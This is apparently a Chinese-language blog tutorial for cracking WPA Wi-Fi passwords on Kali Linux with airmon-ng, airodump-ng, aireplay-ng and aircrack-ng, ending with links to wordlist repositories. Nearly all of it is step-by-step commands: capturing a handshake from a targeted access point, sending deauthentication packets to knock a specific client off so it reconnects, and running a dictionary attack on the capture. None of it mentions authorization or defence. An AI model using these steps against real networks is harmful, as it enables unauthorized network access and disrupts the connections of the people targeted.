markdown
*
基于 Kali Linux Debian系
* ## (一)准备 需要准备免驱无线网卡,最好不要用电脑网卡 ```text #使用该命令查看可使用网卡 airmon-ng #将该网卡更改为监视者模式 airmon-ng start wlan1 #通过以下命令查看是否进入监视者模式(Mode:Monitor) iwconfig ``` ## (二)捕获握手包 ```text #启动网卡扫描附近的无线网络 airodump-ng wlan1 ``` 接下来两个命令同时进行 ```text #对某一个特定目标进行扫描,捕获握手包,并写入名为wireless的文件中(当出现 WPA handshake: BSSID #时表示成功捕获) airodump-ng -w wireless -c 6 --bssid 22:47:DA:62:2A:F0 wlan1 #格式为 airodump-ng -w 写入文件名称 -c CH网络信道 --bassid 无线网络mac地址 网卡名称 ``` ```text #ack攻击特定无线网络的某一个终端,使其重新链接,以便捕获握手包 aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlan1 #格式为 aireplay-ng -0 攻击次数 -a BASSID -c 终端mac地址 网卡名称 ``` ## (三)破解无线密码 ```text #准备密码字典尝试破解 aircrack-ng -w common.txt wireless.cap #格式为 aircrack-ng -w 密码字典位置 保存握手包的文件位置 ``` 成功与否取决于密码的强度于字典的覆盖范围 ## (四)结束 ```text #关闭监视者模式 airmon-ng down wlan1 ``` 密码字典网络资源: ```text https://github.com/TheKingOfDuck/fuzzDicts https://github.com/fuzzdb-project/fuzzdb https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/rootphantomer/Blasting_dictionary ```
评论